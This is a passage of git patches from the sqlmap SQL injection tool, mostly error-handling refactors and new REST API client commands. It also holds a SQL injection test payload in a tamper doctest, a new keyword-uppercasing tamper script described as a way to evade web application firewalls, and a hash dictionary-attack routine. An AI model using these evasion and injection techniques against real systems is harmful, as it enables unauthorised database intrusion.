If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -2071,7 +2071,7 @@ def _mergeOptions(inputOptions, overrideOptions): inputOptions = base64unpickle(inputOptions.pickledOptions) except Exception, ex: errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions - errMsg += " ('%s')" % ex.message if ex.message else "" + errMsg += " ('%s')" % ex if ex.message else "" raise SqlmapSyntaxException(errMsg) if inputOptions.configFile: diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index dbbc5ad78..d18f87454 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission """ from lib.core.common import checkFile +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import openFile from lib.core.common import unArrayizeValue @@ -67,7 +68,7 @@ def configFileParser(configFile): config = UnicodeRawConfigParser() config.readfp(configFP) except Exception, ex: - errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % ex.message + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): diff --git a/lib/request/connect.py b/lib/request/connect.py index 76b1afdf8..b5b716bbc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -40,6 +40,7 @@ from lib.core.common import getCurrentThreadData from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import pushValue @@ -497,22 +498,22 @@ class Connect(object): if hasattr(conn.fp, '_sock'): 
conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occurred during connection closing ('%s')" % msg + except Exception, ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) logger.warn(warnMsg) - except urllib2.HTTPError, e: + except urllib2.HTTPError, ex: page = None responseHeaders = None try: - page = e.read() if not skipRead else None - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + warnMsg += "to get error page information (%d)" % ex.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: @@ -522,13 +523,13 @@ class Connect(object): finally: page = page if isinstance(page, unicode) else getUnicode(page) - code = e.code + code = ex.code kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) + status = getUnicode(ex.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: @@ -545,11 +546,11 @@ class Connect(object): logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) - if e.code == httplib.UNAUTHORIZED and not conf.ignore401: + if ex.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) - elif e.code == httplib.NOT_FOUND: + elif ex.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise 
SqlmapConnectionException(errMsg) @@ -557,11 +558,11 @@ class Connect(object): debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) - elif e.code == httplib.GATEWAY_TIMEOUT: + elif ex.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: - warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, httplib.responses[ex.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) @@ -575,7 +576,7 @@ class Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException), e: + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException): tbMsg = traceback.format_exc() if "no host given" in tbMsg: @@ -718,7 +719,7 @@ class Connect(object): payload = function(payload=payload, headers=auxHeaders) except Exception, ex: errMsg = "error occurred while running tamper " - errMsg += "function '%s' ('%s')" % (function.func_name, ex) + errMsg += "function '%s' ('%s')" % (function.func_name, getSafeExString(ex)) raise SqlmapGenericException(errMsg) if not isinstance(payload, basestring): diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index 08e6b4193..0ade4aca4 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -9,6 +9,7 @@ import httplib import socket import urllib2 +from lib.core.common import getSafeExString from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -57,7 +58,7 @@ class 
HTTPSConnection(httplib.HTTPSConnection): sock.close() except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % ex.message) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni @@ -77,7 +78,7 @@ class HTTPSConnection(httplib.HTTPSConnection): sock.close() except (ssl.SSLError, socket.error, httplib.BadStatusLine), ex: self._tunnel_host = None - logger.debug("SSL connection error occurred ('%s')" % ex.message) + logger.debug("SSL connection error occurred ('%s')" % getSafeExString(ex)) if not success: raise SqlmapConnectionException("can't establish SSL connection") diff --git a/lib/utils/api.py b/lib/utils/api.py index caa46c188..45eb46be8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -17,6 +17,7 @@ import time import urllib2 from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode @@ -87,7 +88,7 @@ class Database(object): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): raise else: break diff --git a/lib/utils/google.py b/lib/utils/google.py index 7849befbb..8ee1ba99c 100644 --- a/lib/utils/google.py +++ b/lib/utils/google.py @@ -12,6 +12,7 @@ import socket import urllib import urllib2 +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import readInput from lib.core.common import urlencode @@ -50,7 +51,7 @@ class Google(object): conn = self.opener.open("http://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: - errMsg = "unable to connect to Google ('%s')" % ex.message + errMsg = 
"unable to connect to Google ('%s')" % getSafeExString(ex) raise SqlmapConnectionException(errMsg) def search(self, dork): diff --git a/lib/utils/hash.py b/lib/utils/hash.py index 81af27026..e0a0a0c50 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -44,6 +44,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import getFileItems from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import normalizeUnicode @@ -771,7 +772,7 @@ def dictionaryAttack(attack_dict): except Exception, ex: warnMsg = "there was a problem while loading dictionaries" - warnMsg += " ('%s')" % ex.message + warnMsg += " ('%s')" % getSafeExString(ex) logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 3f20432d9..555be564b 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -11,6 +11,7 @@ import sqlite3 import threading import time +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import serializeObject from lib.core.common import unserializeObject @@ -77,7 +78,7 @@ class HashDB(object): for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): raise except sqlite3.DatabaseError, ex: errMsg = "error occurred while accessing session file '%s' ('%s'). 
" % (self.filepath, ex) @@ -127,7 +128,7 @@ class HashDB(object): if retries == 0: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message + warnMsg += "the session file ('%s')" % getSafeExString(ex) logger.warn(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 125aa8226..1d9e770b7 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -12,6 +12,7 @@ from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -341,13 +342,13 @@ class Entries: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % ex.message + errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % ex.message + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: diff --git a/sqlmap.py b/sqlmap.py index 6bb12a56f..d7bf52912 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -25,6 +25,7 @@ from lib.controller.controller import start from lib.core.common import banner from lib.core.common import createGithubIssue from lib.core.common import dataToStdout +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import maskSensitiveData from lib.core.common import setPaths @@ -119,7 +120,7 @@ def main(): cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: - errMsg = getUnicode(ex.message) + errMsg = getSafeExString(ex) logger.critical(errMsg) sys.exit(1) diff 
--git a/tamper/symboliclogical.py b/tamper/symboliclogical.py index cb8e91630..152e028ce 100644 --- a/tamper/symboliclogical.py +++ b/tamper/symboliclogical.py @@ -19,7 +19,7 @@ def tamper(payload, **kwargs): Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) >>> tamper("1 AND '1'='1") - '1 && '1'='1' + "1 %26%26 '1'='1" """ retVal = payload From c05c0ff4356dfdf62f30350df456275c562d7540 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 15:55:49 +0200 Subject: [PATCH 15/92] Minor patch with imports --- lib/controller/controller.py | 1 - lib/core/option.py | 1 + lib/core/target.py | 1 - 3 files changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/controller/controller.py b/lib/controller/controller.py index 0e82a7c23..e557c6ac1 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -25,7 +25,6 @@ from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import getPublicTypeMembers from lib.core.common import getSafeExString -from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import intersect diff --git a/lib/core/option.py b/lib/core/option.py index e9d4331b9..e2157806a 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -34,6 +34,7 @@ from lib.core.common import boldifyMessage from lib.core.common import checkFile from lib.core.common import dataToStdout from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import extractRegexResult from lib.core.common import filterStringValue from lib.core.common import findPageForms diff --git a/lib/core/target.py b/lib/core/target.py index cdfd538f0..98101d433 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -39,7 +39,6 @@ from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from 
lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException from lib.core.option import _setDBMS From c4f9e66a6fc9fea719a5b49bcd7b4431983c4563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 10 Sep 2015 16:21:31 +0200 Subject: [PATCH 16/92] Patch related to the #1403 --- lib/core/common.py | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index de7ce354c..fc91fff44 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -909,14 +909,15 @@ def readInput(message, default=None, checkBatch=True): answer = item.split('=')[1] if len(item.split('=')) > 1 else None if answer and question.lower() in message.lower(): retVal = getUnicode(answer, UNICODE_ENCODING) + elif answer is None and retVal: + retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING)) - infoMsg = "%s%s" % (message, retVal) - logger.info(infoMsg) + if retVal: + infoMsg = "%s%s" % (message, retVal) + logger.info(infoMsg) - debugMsg = "used the given answer" - logger.debug(debugMsg) - - break + debugMsg = "used the given answer" + logger.debug(debugMsg) if retVal is None: if checkBatch and conf.get("batch"): From f89ce2173f736fc6a51a86ccc4473fa245546c32 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 12 Sep 2015 15:13:30 +0200 Subject: [PATCH 17/92] Fixes #1404 --- lib/request/connect.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b5b716bbc..b1ecf8f23 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import compiler import httplib import json @@ -576,7 +577,7 @@ class 
Connect(object): debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) - except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, ProxyError, SqlmapCompressionException, WebSocketException): + except (urllib2.URLError, socket.error, socket.timeout, httplib.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException): tbMsg = traceback.format_exc() if "no host given" in tbMsg: From 5ce3306114e70edb8ee049a3fb8f083ef75b3fa2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 13 Sep 2015 14:47:27 +0200 Subject: [PATCH 18/92] Adding new tamper script (Issue #1247) --- tamper/uppercase.py | 46 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 tamper/uppercase.py diff --git a/tamper/uppercase.py b/tamper/uppercase.py new file mode 100644 index 000000000..1a1af3a35 --- /dev/null +++ b/tamper/uppercase.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces each keyword character with upper case value + + Tested against: + * Microsoft SQL Server 2005 + * MySQL 4, 5.0 and 5.5 + * Oracle 10g + * PostgreSQL 8.3, 8.4, 9.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that has poorly written permissive regular expressions + * This tamper script should work against all (?) 
databases + + >>> tamper('insert') + 'INSERT' + """ + + retVal = payload + + if payload: + for match in re.finditer(r"[A-Za-z_]+", retVal): + word = match.group() + + if word.upper() in kb.keywords: + retVal = retVal.replace(word, word.upper()) + + return retVal From 1417decdf1c7b284cd714bcb3bfe26a1da14839f Mon Sep 17 00:00:00 2001 From: daremon Date: Mon, 14 Sep 2015 17:31:02 +0300 Subject: [PATCH 19/92] Added commands stop, kill, list to API client --- lib/utils/api.py | 33 ++++++++++++++++++++++++--------- 1 file changed, 24 insertions(+), 9 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 45eb46be8..d66097261 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -368,18 +368,19 @@ def task_delete(taskid): ################### +@get("/admin/list") @get("/admin//list") -def task_list(taskid): +def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) + logger.debug("[%s] Listed task pool") + if taskid is not None: tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = {x: dejsonize(scan_status(x))['status'] + for x in list(DataStore.tasks)} + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin//flush") @@ -475,7 +476,9 @@ def scan_stop(taskid): """ Stop a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -490,7 +493,9 @@ def scan_kill(taskid): """ Kill a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + 
DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -691,7 +696,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): print break - if command.lower() in ("data", "log", "status"): + if command.lower() in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue @@ -743,6 +748,13 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Switching to task ID '%s' " % taskid) + elif command.lower() == "list": + raw = _client(addr + "/admin/list") + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command " + command) + dataToStdout("%s\n" % raw) + elif command.lower() in ("exit", "bye", "quit", 'q'): return @@ -753,6 +765,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): msg += "data Retrieve and show data for current task\n" msg += "log Retrieve and show log for current task\n" msg += "status Retrieve and show status for current task\n" + msg += "stop Stop current task\n" + msg += "kill Kill current task\n" + msg += "list Display all tasks\n" msg += "exit Exit this client\n" dataToStdout(msg) From 5de1825d0c94dc5dc2093acadf74fd1474248c1e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 10:48:23 +0200 Subject: [PATCH 20/92] Fixes #1412 --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index b1ecf8f23..19ae69301 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -630,7 +630,7 @@ class Connect(object): raise SqlmapConnectionException(warnMsg) finally: - if not isinstance(page, unicode): + if isinstance(page, basestring) and not isinstance(page, unicode): if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not 
re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): page = unicode(page, errors="ignore") else: From ee3857444906354f4c596b2bd38a3ddf833b9bea Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 13:26:25 +0200 Subject: [PATCH 21/92] Fixes #1411 --- lib/core/common.py | 4 ++-- lib/core/replication.py | 19 +++++++++++++------ 2 files changed, 15 insertions(+), 8 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index fc91fff44..78a64892b 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3979,7 +3979,7 @@ def pollProcess(process, suppress_errors=False): break -def getSafeExString(ex): +def getSafeExString(ex, encoding=None): """ Safe way how to get the proper exception represtation as a string (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) @@ -3992,4 +3992,4 @@ def getSafeExString(ex): elif getattr(ex, "msg", None): retVal = ex.msg - return getUnicode(retVal) + return getUnicode(retVal, encoding=encoding) diff --git a/lib/core/replication.py b/lib/core/replication.py index c5bbd24cc..476604598 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -8,9 +8,11 @@ See the file 'doc/COPYING' for copying permission import sqlite3 from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING class Replication(object): """ @@ -49,11 +51,16 @@ class Replication(object): self.name = unsafeSQLIdentificatorNaming(name) self.columns = columns if create: - self.execute('DROP TABLE IF EXISTS "%s"' % self.name) - if not typeless: - self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) - else: - 
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + try: + self.execute('DROP TABLE IF EXISTS "%s"' % self.name) + if not typeless: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns))) + else: + self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns))) + except Exception, ex: + errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING) + errMsg += "located at '%s'" % self.parent.dbpath + raise SqlmapGenericException(errMsg) def insert(self, values): """ @@ -70,7 +77,7 @@ class Replication(object): try: self.parent.cursor.execute(sql, parameters) except sqlite3.OperationalError, ex: - errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex) + errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING) errMsg += "located at '%s'. 
Please make sure that " % self.parent.dbpath errMsg += "it's not used by some other program" raise SqlmapGenericException(errMsg) From 058870635b38b5dc762fb99e530d70b397a39b97 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 14:37:30 +0200 Subject: [PATCH 22/92] Update for an #1414 --- lib/utils/api.py | 27 +++++++++++++++++---------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 45eb46be8..21068bb96 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -116,7 +116,8 @@ class Database(object): class Task(object): - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None self.options = None @@ -343,7 +344,9 @@ def task_new(): Create new task ID """ taskid = hexencode(os.urandom(8)) - DataStore.tasks[taskid] = Task(taskid) + remote_addr = request.remote_addr + + DataStore.tasks[taskid] = Task(taskid, remote_addr) logger.debug("Created new task: '%s'" % taskid) return jsonize({"success": True, "taskid": taskid}) @@ -374,13 +377,15 @@ def task_list(taskid): List task pull """ if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = [] + for key in DataStore.tasks: + if DataStore.tasks[key].remote_addr == request.remote_addr: + tasks.append(key) + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin//flush") def task_flush(taskid): @@ -389,11 +394,13 @@ def task_flush(taskid): """ if is_admin(taskid): DataStore.tasks = dict() - logger.debug("[%s] Flushed task pool" % taskid) - return 
jsonize({"success": True}) else: - logger.warning("[%s] Unauthorized call to task_flush()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + for key in list(DataStore.tasks): + if DataStore.tasks[key].remote_addr == request.remote_addr: + del DataStore.tasks[key] + + logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # From c59ead36cee6f792f3fe6b5d2bcc4729eba3dffb Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 Sep 2015 17:23:59 +0200 Subject: [PATCH 23/92] Patch for Python 2.6 (SyntaxError) --- lib/utils/api.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 21068bb96..c73adaec8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -721,7 +721,9 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = None continue - cmdLineOptions = { k: v for k, v in cmdLineOptions.iteritems() if v is not None } + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] raw = _client(addr + "/task/new") res = dejsonize(raw) From c2fb2161d34e21f6cece0e3d5069c4c9c78bdd76 Mon Sep 17 00:00:00 2001 From: daremon Date: Wed, 16 Sep 2015 00:15:16 +0300 Subject: [PATCH 24/92] Added flush command --- lib/utils/api.py | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 7a73905a8..09aac2c5a 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -698,12 +698,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): while True: try: - command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip().lower() except (EOFError, KeyboardInterrupt): print break - if command.lower() in ("data", "log", 
"status", "stop", "kill"): + if command in ("data", "log", "status", "stop", "kill"): if not taskid: logger.error("No task ID in use") continue @@ -713,7 +713,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): logger.error("Failed to execute command " + command) dataToStdout("%s\n" % raw) - elif command.lower().startswith("new"): + elif command.startswith("new"): if ' ' not in command: logger.error("Program arguments are missing") continue @@ -745,7 +745,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Scanning started") - elif command.lower().startswith("use"): + elif command.startswith("use"): taskid = (command.split()[1] if ' ' in command else "").strip("'\"") if not taskid: logger.error("Task ID is missing") @@ -757,17 +757,17 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): continue logger.info("Switching to task ID '%s' " % taskid) - elif command.lower() == "list": - raw = _client(addr + "/admin/0/list") + elif command in ("list", "flush"): + raw = _client(addr + "/admin/0/" + command) res = dejsonize(raw) if not res["success"]: logger.error("Failed to execute command " + command) dataToStdout("%s\n" % raw) - elif command.lower() in ("exit", "bye", "quit", 'q'): + elif command in ("exit", "bye", "quit", 'q'): return - elif command.lower() in ("help", "?"): + elif command in ("help", "?"): msg = "help Show this help message\n" msg += "new ARGS Start a new scan task with provided arguments (e.g. 'new -u \"http://testphp.vulnweb.com/artists.php?artist=1\"')\n" msg += "use TASKID Switch current context to different task (e.g. 
'use c04d8c5c7582efb4')\n" @@ -777,6 +777,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): msg += "stop Stop current task\n" msg += "kill Kill current task\n" msg += "list Display all tasks\n" + msg += "flush Flush tasks (delete all tasks)\n" msg += "exit Exit this client\n" dataToStdout(msg) From 2cea977e1278a6341efe984f8ef5ed8f665472cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 14:58:01 +0200 Subject: [PATCH 25/92] Fixes #1415 --- lib/core/common.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/core/common.py b/lib/core/common.py index 78a64892b..205f62864 100755 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3871,13 +3871,18 @@ def decloakToTemp(filename): """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] + + _ = utf8encode(os.path.split(filename[:-1])[-1]) + prefix, suffix = os.path.splitext(_) prefix = prefix.split(os.extsep)[0] + handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) + with open(filename, "w+b") as f: f.write(content) + return filename def prioritySortColumns(columns): From 65a8f0fe326bbafed2f67991ad084103fe656333 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 15:25:40 +0200 Subject: [PATCH 26/92] Minor enhancement --- lib/request/connect.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index 19ae69301..fe7c4cd23 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -891,7 +891,7 @@ class Connect(object): if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER - variables = {"uri": uri, "lastPage": threadData.lastPage} + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals()} originals = {} keywords = keyword.kwlist From aa2112b3603ed7f87e66f33049c0b927c983ec9e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 16:18:58 +0200 Subject: [PATCH 
